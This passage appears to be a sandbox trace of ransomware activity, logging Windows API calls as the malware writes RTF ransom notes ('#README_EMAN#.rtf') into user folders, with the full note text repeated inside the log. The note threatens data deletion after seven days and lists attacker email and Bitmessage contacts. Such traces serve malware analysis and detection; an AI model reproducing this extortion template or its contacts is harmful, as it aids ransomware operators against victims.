L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n£\x94\x12ç]z9úW­Á\x7fvß\x84ôΧÐùæËH3\n", lpUsedDefaultChar=0x0) returned 8717 [0278.525] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.526] CloseHandle (hObject=0x2c8) returned 1 [0278.526] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\#readme_eman#.rtf")) returned 0xffffffff [0278.526] GetLastError () returned 0x2 [0278.526] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.527] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 